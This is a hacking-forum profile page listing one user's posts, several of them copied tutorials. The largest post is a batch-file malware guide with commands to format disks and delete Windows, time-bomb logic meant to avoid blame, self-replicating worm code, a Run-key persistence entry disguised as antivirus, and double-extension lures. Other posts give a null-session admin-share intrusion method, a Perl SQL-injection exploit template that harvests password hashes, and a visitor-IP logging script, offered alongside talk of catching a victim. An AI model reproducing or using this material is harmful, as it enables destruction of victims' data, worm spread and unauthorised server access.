Jump to content

Sub_Zero

Active Members
  • Posts

    331
  • Joined

  • Last visited

Everything posted by Sub_Zero

  1. stiam de schema asta mai de mult da nu stiam de ce,mersi Shocker ;D
  2. go to www.netdisaster.com Enjoy...
  3. Heres a Tutorial on the Registry. The Tutorial is Broken down into 3 sections. 1)Little Background on the Registry. 2)Adding values to the registry. 3)Deleting Keys and Values. ------------------------------------------------------------------------------------------------------- 1) ****Little Background on the Registry.**** The Registry is basically a database used to store Information,Settings and Options. It contains everything from settings of all the Hardware, Software and Users. The registry is mainly made up of the similar directory structure made of on your hard disk. Each branch is called a Hive. Now inside the Hive there lies Key's. Now within the Key there are values of course. There are really three main types of values. 1)String 2)Binary 3)DWORD I will go into more detail about them further on in the tutorial. Now you might be saying to your self? What are Branches? Branches are shown as a Folder Icon in the registry with the Branches name to the right of it. There are 5 main branches in Windows XP and 2000 each with a portion of information which make up the registry. 1)HKEY_CLASSES_ROOT: This branch has all the file types on your computer. 2)HKEY_CURRENT_USER: This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the Computer. 3)HKEY_LOCAL_MACHINE: This branch contains the Computer's specific information about the type of hardware, software, and other preferences on the Computer. 4)HKEY_USERS: This contains certain prefernces for each of the user at the Computer. 5)HKEY_CURRENT_CONFIG: This branches to the HKEY_LOCAL_MACHINE for current hardware configuration. Now onto the Values of the Registry but more in depth this time. 1)REG_BINARY: This type stores the value as raw binary data. 2)REG_DWORD: This type represents the data by a four byte number and is commonly used for boolean values such as "0" to disable and "1" for enabling. Like a Light Switch, Up to put light on and down to put light off. 3)REG_SZ: This type is a standard string used to represent human readable text values. Also there are REG_EXPAND_SZ and REG_MULTI_SZ. 2) ****Adding values to the registry.**** Now enough of just explaining the registry lets do something with the registry. Firstly you will need Notepad. Im sure everyones got that. My First Example is going to input "Hello" on the top Bar of Internet Explorer. Now to input the commands. <--------------Starting Commands--------------> REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain] "Window Title"="Hello" <--------------End of Commands--------------> Now I Will explain this to you. The line "[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain]" means that Your little reg file will look for that location in the registry. The line "Window Title"="Hello" Now all this does is make a new String Value "Window Title" and in that Key the Data is "Hello" Pretty simple isnt it. Now just save this as a .reg file and run it. Now these commands have only been tested on Windows XP it might be a different location in other Versions of Windows. Now go check if it has worked. This is how you can add things to the registry or change things to the registry. 3) ****Deleting Keys and Values.**** Now to delete a whole Key from the registry do the same as I told you above but with different commands. <--------------Starting Commands--------------> REGEDIT4 [-HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain] <--------------End of Commands--------------> Now I dont reccomend doing that if you use Internet Explorer. But as you can see all we done is place a "-" sign in front of the Branch. Now to delete Individual Keys like the one we made for Internet Explorer is as followed. <--------------Starting Commands--------------> REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain] "Window Title"=- <--------------End of Commands--------------> Now as you can see we have specified the branch and location. Then we have placed the Value's name and put a "-" sign to it so it deletes whats inside that value. Hope this helps you understand abit about the registry. With Regards... Bharath
  4. As most of you know .bat files uses basic ms-dos commands to do something - i will explain how to gather information from other computers, how to create worms or how to basicly destroy someone's computer. 1)How to begin You should begin with making some .bat file - its silly, but many ppl dont even know such things - easiest way is to make .txt file and change extension to .bat - but rebember if you have "hide known extensions" option enabled you can accidentaly make "xxx.bat.txt" file - and it still will be .txt file. 2)Basic Command When you create .bat file you should start creating it using basic command. Almost always in first line you should put "@echo off" command - it will hide everything you dont want to show to user. When you want to show something you simply put "echo" at beginning of line with that thing. Example: Code: @echo off blablablablablabla echo ung ung ung ung eheheheheheheheheh In such case user will only see : @echo off ung ung ung ung But when he will se "@echo off" command he will know you are hidding something and try to reveal it, so you need to hide also "@echo off". How to do it ? Using another command - "cls"."cls" command clears all the screen, so when you type it after "@eho off" command it will be cleared. Last basic command you need to know is "exit" command - you should put it at the end of your batch file to close console when your program will end. 3)Destructive commands There are many more or less destructive commands - i will write them but i dont take responsibility on what you use them for. Code: format c: /q /autotest (this command will format c: disk without question "do you want to format ? (y/n)") DELTREE /Y C: (this command will delete all files on disc C:) rundll32 mouse,disable (this command will disable mouse till next restart) rundll32 keyboard,disable (this command will disable keyboard till next restart) rundll32 user,disableoemlayer (this command will ..dont know the word - STOP the system and you NEED to restart) DELTREE /Y %windir% (it will remove windows ) rundll32 shell32,SHExitWindowsEx 2 (this command will restart your windows, but not all computer) rundll32 shell32,SHExitWindowsEx -1 (this command will restart only explorer) rundll32 user,swapmousebutton (it will swap mouse buttons) rundll32 user,setcursorpos (it will move mouse cursor to right/top corner) 4)Time Bombing Its obvious that if you give your program to someone and it will destroy something, computer owner will know thats your fault. To negate this effect you can use time bombing ability (it will destroy something after some time). How to use it ? Here is example: Code: Code: @ECHO OFF GOTO TEST :DESTRUCTION GOTO END :TEST REM Here we need to give some cases GOTO DESTRUCTION GOTO END :END If we want to format some computer simply do: Code: @echo off echo. | date | find /c /i "2005.05.10" > NUL If errorlevel 1 GoTo End FORMAT C: /Q /AUTOTEST :End In such case program will start format on 10.05.2005 5)Worm If you want your program to survive somewhere on target computer you need to copy it somewhere. But you dont need to make another file - you can also simply add your program source into other .bat files. You can simply do this using suh commands: Code: ctty nul for %%i in (*.bat) do copy %0+%%i %%i /y >nul This command will add you source of your file to any .bat file in same directory. Code: type %0 >>other.bat This command will clear other.bat file soure and write your source into it. If you want your program to start when windows starts you need to copy it into winstart.bat file (its in windows folder) How? just add to your file this line: Code: COPY %0 %windir%WINSTART.BAT %windir% is Windows folder (it doesnt care that its name is WINNT WIN or WINDOWS - it will find it ) And how to add your program to registry ? Add this: Code: @echo off copy %0 c:prog.bat echo REGEDIT4 >>registry.reg echo. >>registry.reg echo [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] >>registry.reg echo "Norton AntyVirus"="C:prog.bat" >>registry.reg echo. >>registry.reg regedit /s registry.reg dir >nul del registry.reg >nul Quote: 6) Gaining Info Quote: When you want to gather info from other computer you should try this: dir *.* (it will show files in same directory) netstat -an (it will show all connected IP at this time) ipconfig (it will show IP, Gate and so on of target computer) ver (it will show OS version) And so on, but this commands will only show those infos - to gather them you need to add ">>xxx.bat" after each of them (where xxx.bat is your program name) to add those infos into your program source, or ">>yyy.zzz" wher yyy.zzz is other file you want to create or add to (you can use any extension). 7)Stealth As you know you need to hide your .bat file source and its activity from user view. Hidding your source code is simly - you can simply add %v% or %x% or %r% or %l% or %q% or %z% between any letter (program wont use those). When you want to hide activity you need to use some "social engineering" . For example you can use some double extensions: Code: pamela.jpg.bat document.doc.bat movie.avi.bat If target has "Hide known extensions" enabled it will only see first extensions You also can emulate some actions for example when you simulate some game try this: Code: Code: @echo off cls echo Starting Graphics..... ----Here you put some commands echo Starting Sound........ ----Also here you put some commands echo Cannot init sound card! run SETSOUND.BAT exit User will thing game didnt started. Also can try with "Not of memory! (need 560 kB to run)", "Incorrect DOS version!" or "Trial version expired (30 days)". END GOod Day ... With Regards Bharath
  5. ********How to write Batch files******* By: Alex Briner (Archangel_Darkangel) (formerly Archangel) ã By Alex Briner and Archangel Ware 2003 ‘with exception to the "Batch commands index which was not made by me Index: -------------------------------------------------------------- I. Introduction to batch II. How to start a batch file III. The basics A. Loops IV. More advanced stuff V. The batch commands index Introduction to batch Batch is one of the easiest scripting languages out there it is based on MS-DOS what a lot of people don’t know is that MS-DOS is not a mere program or just something on your computer but it is actually and O.S. or operating system. This operating system is actually more powerful than the MS-DOS that you are use to on your windows Operating system. When you run MS-DOS under windows like most people do because its either being run under Windows or is run just as DOS it loses some of its potential since it has to interact with windows as well. In the old days they didn’t have GUI or Graphical User Interface. So all that they had to use was DOS. DOS stands for Disk Operating System. How to start a batch file To make a batch file all that you have to do is simply make a new notepad. Yes that’s right all that you need to make a notepad, you don’t need all that fancy software. Once you start a new batch file you put in the code and go to "File" then to "Save As". once you are in the "Save As" windows go and name it whatever you want but instead of just having the name like normal at the end of the name without a space type ".bat" (without the quotes of course). For example: FirstBatch.bat Now you know how to make a batch file now all you need is to learn the code! The Basics When you make a new batch file you need to declare if you want the code to show (when ran the code will be shown to the user running it) and this is not recommended most times for it distacts the user from the main point of the program and makes them wonder what all those weird words mean. Most often people who use batch on a regular basis turn off the echo so that it wont tell the user the code as well. How you do this is by simply writing on the first line: @echo off Now some of the basic commands are echo, copy, del, deltree, and end. Echo - displays text written after the "echo" for example: Echo "Hello, I hope you enjoy this tutorial" Copy - this will copy the batch file to the given directory, for example: Copy C:program Filesnew folder Del - deletes certain file, for example Del C:program Filesnew folder Deltree - deletes a tree of files in given directory, for example: Deltree C:program Filesnew folder End - ends the script for example: End Start - starts a .exe (program) for example: Start norepad (or if not a built in program) start C:programFilesnew game.exe Now lets take a look at this when its all put together. Code: @echo off Echo "Hello, I hope you enjoy this tutorial" Copy C:program Filesnew folder Del C:program Filesnew folder Deltree C:program Filesnew folder1 Start notepad End Loops Loops make something happen over and over again and never stop untilspecified to or forced to (like shuting down your computer). To make a loop you do this: Code: :loop (code) Goto :loop In a more real situation it would look like this: Code: @echo off :loop Echo hello, this is called a loop! And I will keep saying this Goto :loop (note: you do not have to make the name "loop" in the code you can have it anything for example: Code: @echo off :cheese Echo you see! Goto :cheese More advanced stuff How to create a blank line in a batch file. What you do is write Echo only at the end of echo put a period for example: Echo. Disable mouse or keyboard or both Code: c:windowsrundll.exe mouse,disable ‘or replace "mouse" with keyboard How to make a choice for the user. Code: @ECHO OFF REM - LABEL INDICATING THE BEGINNING OF THE DOCUMENT. :BEGIN CLS REM - THE BELOW LINE GIVES THE USER 3 CHOICES (DEFINED AFTER /C CHOICE /N /C:123 PICK A NUMBER (1, 2, or 3)%1 REM - THE NEXT THREE LINES ARE DIRECTING USER DEPENDING UPON INPUT IF ERRORLEVEL ==3 GOTO THREE IF ERRORLEVEL ==2 GOTO TWO IF ERRORLEVEL ==1 GOTO ONE GOTO END :THREE ECHO YOU HAVE PRESSED THREE GOTO END :TWO ECHO YOU HAVE PRESSED TWO GOTO END NE ECHO YOU HAVE PRESSED ONE :END To start a program maximized you would add a /M after start for example: Code: START /M "C:WINDOWSNOTEPAD.EXE" CREATING A BATCH FILE DELAY how to delay a batch file any where from 5 to 99 seconds. In the below example weshow a 5 second delay. Code: TYPE NUL | CHOICE.COM /N /CY /TY,5 >NUL HOW TO MAKE A TIME LOG In the following example you will have the capability of creating a time log of when the batch file is loaded or for example in the autoexec.bat when someone logs into a computer. Code: ECHO. |TIME > TIME COPY LOG +TIME A diferent and more complicated method that to my knowledge cannot be used in Windows NT, Windows 2000 or Windows ME would be the following: Code: echo @prompt set date=$d$_set time=$t$h$h$h > {a}.bat %comspec% /e:2048 /c {a}.bat > {b}.bat for %%v in ({b}.bat del) do call %%v {?}.bat echo %date% %time% >> log For the above batch file to work properly you must create a file called log by typing "edit log" (without the quotes) and then save an exit the file which will create the file at 0 bytes. If this file is not created or not created properly you will receive the error message "Content of destination lost before copy". How to quickly replace the file extensions of several files. Use the following command at the MS-DOS prompt or within a batch file. Code: xcopy *.vbs *.wav This would rename all files with .vbs to .wav. While keeping the original files. How to restart the computer with a batch file. For windows 98 type: Code: START C:WINDOWSRUNDLL.EXE user.exe,exitwindowsexec EXIT Or: rundll32.exe shell32.dll,SHExitWindowsEx n Where n is equal to one of the following numbers for the proper action. 0 - LOGOFF 1 - SHUTDOWN 2 - REBOOT 4 - FORCE 8 - POWEROFF How to run a batch file each time the computer boots: Place a line in your autoexec.bat that calls the batch file each time you want to boot the computer. For example: Code: CALL C:myfile.bat Shutdown for windows 98 and ME Code: RUNDLL32 SHELL32.DLL,SHExitWindowsEx 1. Shutdown for Windows XP Code: shutdown -r -t 10 Deleting files in MS-Dos without a prompt To get rid of the prompting use the deltree command and add the tag /y. For example: Code: deltree c:windowstemp*.* /y Although this does nto work for all versions of MS-DOS and windows if this does not work try: Code: echo y | del %1*.* once created, you can type the name of the batch file then the name of the directory that you wish to delete. Enjoy.......
  6. I am Sure u guys Know All these commands.... I want to Help The Beginers.. So i am Posting This.... Useful Things to do on CMD! First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS. Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter. This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD. First thing you need to know is some very helpfull commands to use on CMD(Command Prompt). In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill). Back to commands: Code: nslookup net view net use net user ping tracert arp route nbtstat netstat ipconfig In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does. Lets start easy... 1) ping : This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the "ping" command. Code: ping x.x.x.x (x is the IP address) or ping www.whatever.com (www.whatever.com is the website you want to ping, but you don't know the IP) OBS: Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down. 2) nslookup : This command has many functionalities. One is for resolving DNS into IP. Lets say you know the website URL but you don't know its IP(and you want to find out). nslookup www.whatever.com (www.whatever.com is the website you want to find out the IP) Now, another really nice function of nslookup is to find out IP of specific Mail Severs. Code: nslookup (enter) set type=mx (enter) yahoo.com This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it? OK, now why would you want to have an IP of a mail server? To send spoofed mail to your friends or even for SE. In case you looking for "How to spoof email", then look for my "How to spoof email tutorial" http://www.infowar.com/forums/showthread.p...=&threadid=2360 3) tracert : This command will give you the hops that a packet will travel to reach its final destination. OBS: This command is good to know the route a packet takes before it goes to the target box. Code: tracert x.x.x.x (x is the IP address) or tracert www.whatever.com (www.whatever.com is the website you don't know the IP) 4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN. Code: arp -a 5) route : This command will show you the routing table, gateway, interface and metric. Code: route print 6) ipconfig : This command will show tons of very helpful things. Your IP, gateway, dns in use. Code: ipconfig or Code: ipconfig /all this command will give all that info but for all networks you might have it. Also, in case you have a dynamic IP and want to change it, then type... Code: ipconfig /release (this will release your IP) ipconfig /renew (this will renew your iP) OBS: Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don't do anything stupid. 7) netstat : This command will show you connection to your box. Code: netstat or Code: netstat -a (this will show you all the listening ports and connection with DNS names) netstat -n (this will show you all the open connection with IP addresses) netstat -an (this will combined both of the above) b)nbtstat : This command will show you the netbios name of the target box. Code: nbtstat -A x.x.x.x (x is the IP address) nbtstat -a computername net view x.x.x.x or computername (will list the available sharing folders on the target box) Now some hints: Code: net use ipaddressipc$ "" /user:administrator (this command will allow you to connect to the target box as administrator) Now if you want to connect to the target box and browse the entire C drive, then use this command: Code: net use K: computernameC$ (this will create a virtual drive on your "my computer" folder) OBS: Keep in mind that this will only works if the target box doesn't have an administrator password set. And least but not last, the "help" command. Quote: whatevercommand /help or Quote: whatevercommand /? This command will help you to understand what it does and all the switchs available for each command. Very useful if you know the command, but forgot the right switch.
  7. mama da idiot mai ii asta ;D
  8. ce nasol,ca a murit :'( imi placeau mult emisiunile lui,oameni ca el nu cred ca o sa mai fie,dumnezeu sa-l odihneasca in pace
  9. multumesc pentru informatie
  10. ma bucur ca-ti place
  11. +------------------------------------------------------+ Writing SQL Injection exploits in Perl Tutorial written by Seth seth[AT]netsons[DOT]org +------------------------------------------------------+ [1] Introduction [2] Little panning of Perl language used into an internet context [3] Perl SQL Injection by examples [4] Gr33tz to ... ---+--- StArT [1] Introduction Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot of operation across the internet just writing a litlle bit of code. So i decided to write a similar guide to make an easiest life to everyone who decide to start writing a perl exploit. There are few requisites u need to proceed: - U must know the basics operation of perl (print, chomp, while, die, if, etc etc...); - U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc...). Now, we are ready to start... [2] Little panning of Perl language used into an internet context Using a Perl code into an internet context means that u should be able to make a sort of dialog between your script and the server side (or other..). To make this u need to use some "Perl modules". Those modules must be put on the head of the script. In this tut we are going to use only the "IO::Socket" module, but there are thousand and if u are curious just search on cpan to retrieve info on every module. [-] Using the IO::Socket module Using this module is quite simple. To make the Perl Interpreter able to use this module u must write on the starting of the script "use IO::Socket". With this module u'll be able to connect to every server defined previously, using a chomp, look at the example. Example: print "Insert the host to connect: "; chomp ($host=<STDIN>); Now suppose that the host inserted is www.fbi.gov. We must declare to the intrpreter that we want to connect to this host. To do this, we must create a new sock that will be used by the interpreter to connect. To create this we are going to write something like this: $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die " ]+[ Connecting ... Can't connect to host.nn"; In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new connection, through the TCP protocol, using the port 80 and direct to the host specified in the chomp ($host=www.fbi.gov). If connection is not possible an error message will appear ("Connecting ... Can't connect to host"). Resume: - Proto=>TCP -------> The protocol to use (TCP/UDP) - PeerAddr=> -------> The server/host to connect - PeerPort=> -------> Port to use for the connection Ok, now let's go to the next step, which is the real hearth of this tut. [3] Perl SQL Injection Assuming that we know what kind of SQL statement must inject, now we are going to see how to do this. The SQL code must be treaty like a normal variable (like "$injection"). Example: $injection=index.php/forum?=[sql_CODE] This string means that we are going to inject the query into "index.php/forum" path, following the correct syntax that will bring us to cause a SQL Injection "?=". Now we must create a piece of code that will go to inject this query into the host vuln. print $sock "GET $injection HTTP/1.1n"; print $sock "Accept: */*n"; print $sock "User-Agent: Hackern"; print $sock "Host: $hostn"; print $sock "Connection: closenn"; This piece of code is the most important one into the building of an exploit. It can be considered the "validation" of the connection. In this case the "print" command doesn't show anything on screen, but it creates a dialogue and sends commands to the host. In the first line the script will send a "GET" to the selected page defined into "$injection". In the third line it tells to the host "who/what" is making the request of "GET". In this case this is Hacker, but it can be "Mozilla/5.0 Firefox/1.0.4" or other. In the fourth line it defines the host to connect to, "$host". With the execution of this script we have made our injection. Resume of the exploit: use IO::Socket print "Insert the host to connect: "; chomp ($host=<STDIN>); $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die " ]+[ Connecting ... Can't connect to host.nn"; $injection=index.php/forum?=[sql_CODE] print $sock "GET $injection HTTP/1.1n"; print $sock "Accept: */*n"; print $sock "User-Agent: Hackern"; print $sock "Host: $hostn"; print $sock "Connection: closenn"; close ($sock); #this line terminates the connection A little trick: Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it. Additionally, u want that your script will show the PWD on your screen. Well, to make this, the next piece of code, could be one of the possible solutions. while($answer = <$sock>) { if ($answer =~ /([0-9a-f]{32})/) { print wrote: +[ Found! The hash is: $1n"; exit(); } This string means that if the answer of the host will show a "word" made by 32 characters ("0" to "9" and "a" to "f"), this word must be considered the MD5 Hash PWD and it must be showed on screen. Conclusions: The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one. U could use also the module "LWP::Simple" in the place of "IO::Socket", but u should change something into the code. This method can be used also, not only for SQL Injection, but, for example, remote file upload or other. [4] Gr33tz to... Gr33tz to pjphem, kdimebag, punish3r, Orvietolug, and some members of h4cky0u forum board... And... Cucciola I Love U! S33 y4 s00n...
  12. ce program grozav,aveam nevoie de el
  13. Uite linku: http://indiandesi.info/property/ ii super ;D
  14. Sub_Zero

    interesant

    frumos site,ii ca un fel de index cu virusi existenti
  15. ok,uite linkul: http://www.sendspace.com/file/twy6fu
  16. Iti arata cum sa controlezi un sever folosind Remote Desktop Connection http://uploaded.to/?id=612334 A fost uploadat de mine. Enjoy...
  17. programu asta ar pute fi folositor ca nu dau dublu-click pe Hard Drive Killer Pro 5 :@
  18. super,chiar avem nevoie de asa ceva,tre sa prind un fraier
  19. :@ nu doar il vezi :@
  20. hey ce face exploitu asta :@ca nu m-am prins
  21. Sub_Zero

    crackeri

    niciodata nu am fost prea bun la mate :@
  22. <? $ip = $REMOTE_ADDR; $host = gethostbyaddr($ip); $date = date("d/m/Y H:i:s"); $email = "bighackeur@Mcft.com"; $sujet = "Ip + Host"; $message = "<html><body>Moment : $date Ip : $ip Host : $host</body></html>"; if(mail($email,$sujet,$message,"Content-Type: text/html")){ echo "Ownneeed";} else { echo "Shit ?";} ?> salveaza acest script cu extensia de .html si inlocuieste bighackeur@Mcft.com cu adresa ta de mail. Enjoy...
  23. Sub_Zero

    Buna

    Sunt fericit ca am gasit in sfarsit un forum romanesc de hacking,si unul buna.Sunt impresionat de ce ati realizat voi aici si sper sa invat cat mai multe
×
×
  • Create New...